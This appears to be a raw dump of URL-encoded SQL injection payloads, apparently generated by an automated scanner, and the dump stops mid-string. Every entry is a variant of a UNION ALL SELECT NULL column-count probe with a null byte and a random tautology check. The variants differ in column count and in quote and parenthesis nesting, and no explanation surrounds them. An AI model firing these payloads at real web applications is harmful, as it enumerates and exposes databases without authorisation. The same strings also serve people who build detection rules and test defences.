1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27qRMY%27%3D%27qRMY 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27rzbi%27%3D%27rzbi 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27ffBo%27%3D%27ffBo 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27JMDc%27%3D%27JMDc 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27GzBq%27%3D%27GzBq 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27gpmO%27%3D%27gpmO 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27HYCa%27%3D%27HYCa 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27NWYB%27%3D%27NWYB 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27UFFU%27%3D%27UFFU 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27HUHc%27%3D%27HUHc 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27OoVM%27%20LIKE%20%27OoVM 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27XYjX%27%20LIKE%20%27XYjX 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27zcsr%27%20LIKE%20%27zcsr 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27AAlk%27%20LIKE%20%27AAlk 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27Mwga%27%20LIKE%20%27Mwga 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27NvXT%27%20LIKE%20%27NvXT 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27FDsf%27%20LIKE%20%27FDsf 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27Yuxc%27%20LIKE%20%27Yuxc 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27suJT%27%20LIKE%20%27suJT 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27EdpR%27%20LIKE%20%27EdpR 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27kBgr%27%20LIKE%20%27kBgr 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27soZd%27%20LIKE%20%27soZd 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27sSgG%27%20LIKE%20%27sSgG 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27ObhT%27%20LIKE%20%27ObhT 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27FOhx%27%20LIKE%20%27FOhx 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27SSqR%27%20LIKE%20%27SSqR 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27Uplm%27%20LIKE%20%27Uplm 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27OfjR%27%20LIKE%20%27OfjR 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27XohT%27%20LIKE%20%27XohT 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27cdpP%27%20LIKE%20%27cdpP 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27trFr%27%20LIKE%20%27trFr 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27hqaF%27%20LIKE%20%27hqaF 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27DJLt%27%20LIKE%20%27DJLt 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27phhK%27%20LIKE%20%27phhK 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27Usfm%27%20LIKE%20%27Usfm 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27bYPB%27%20LIKE%20%27bYPB 